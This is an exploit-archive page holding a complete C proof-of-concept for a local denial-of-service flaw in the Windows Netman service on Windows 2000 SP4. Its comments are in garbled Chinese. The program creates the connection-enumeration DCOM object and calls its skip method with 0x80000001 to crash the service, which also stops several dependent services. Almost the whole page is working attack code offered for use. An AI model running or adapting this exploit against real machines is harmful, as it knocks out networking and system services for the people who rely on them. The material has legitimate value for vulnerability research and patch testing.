Microsoft Windows Netman server local denial of service exploit.
9766bbe467cea9848a0e46f2b7dae12fea83b18798aa3dcc95a53332b9c17e6f/* Windows Netman Service Local DOS Vulnerability.
*
* By bkbll bkbll#cnhonker.net 2005-7-14 2:49ÏÂÎç
*
* TESTED ON win2k sp4
*
* ÒòΪNetmanÊÇͨ¹ýsvchost.exe -k netsvcsÆô¶¯, µ±¸Ã·þÎñÍ£Ö¹µôºó,ÈçÏ·þÎñÒ²½«ÖÐÖ¹:
*
* EventSystem,Irmon,RasMan,NtmsSvc,SENS
*
*/
#define _WIN32_DCOM
#include <stdio.h>
#include <stdlib.h>
#include <objbase.h>
#include <unknwn.h>
#include <windows.h>
#pragma comment(lib,"ole32")
MIDL_INTERFACE("98133274-4B20-11D1-AB01-00805FC1270E")
VCConnectionManagerEnumConnection //: public IDispatch
{
public:
virtual HRESULT STDMETHODCALLTYPE QueryInterface(void) = 0;
virtual ULONG STDMETHODCALLTYPE AddRef( void) = 0;
virtual ULONG STDMETHODCALLTYPE Release( void) = 0;
virtual HRESULT STDMETHODCALLTYPE next(void) = 0;
virtual HRESULT STDMETHODCALLTYPE skip(DWORD) = 0;
virtual HRESULT STDMETHODCALLTYPE reset(void) = 0;
virtual HRESULT STDMETHODCALLTYPE clone(void) = 0;
};
CLSID CLSID_ConnectionManagerEnumConnection = {0x0BA126AD2,0x2166,0x11D1,{0xB1,0xD0, 0x0, 0x80, 0x5F, 0x0C1, 0x27, 0x0E}};
IID IID_IEnumNetConnection = {0xC08956A0,0x1CD3,0x11D1,{0x0B1,0x0C5, 0x0, 0x80, 0x5F, 0x0C1, 0x27, 0x0E}};
//Ö÷º¯Êý
main(int argc,char **argv)
{
VCConnectionManagerEnumConnection *clientcall;
HRESULT hr;
printf("Windows Netman Service Local DOS Vulnerability..\n\n");
//³õʼ»¯
CoInitializeEx(NULL,COINIT_MULTITHREADED);
printf("DCOM Client Trying started\n");
hr = CoCreateInstance(CLSID_ConnectionManagerEnumConnection,NULL,CLSCTX_LOCAL_SERVER,IID_IEnumNetConnection,(void**)&clientcall);
if (hr != S_OK)
{
printf("CoCreateInstanceEx failed:%d\n",GetLastError());
return -1;
}
printf("Exploit netman service ....\n");
hr = clientcall->skip(0x80000001);//(void**)&p);
if(SUCCEEDED(hr))
{
printf("Call client proc Success.\n");
}
else
printf("Call client proc failed:%d\n",GetLastError());
hr = clientcall->Release();
CoUninitialize();
printf("Client exited.\n");
return 1;
}
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed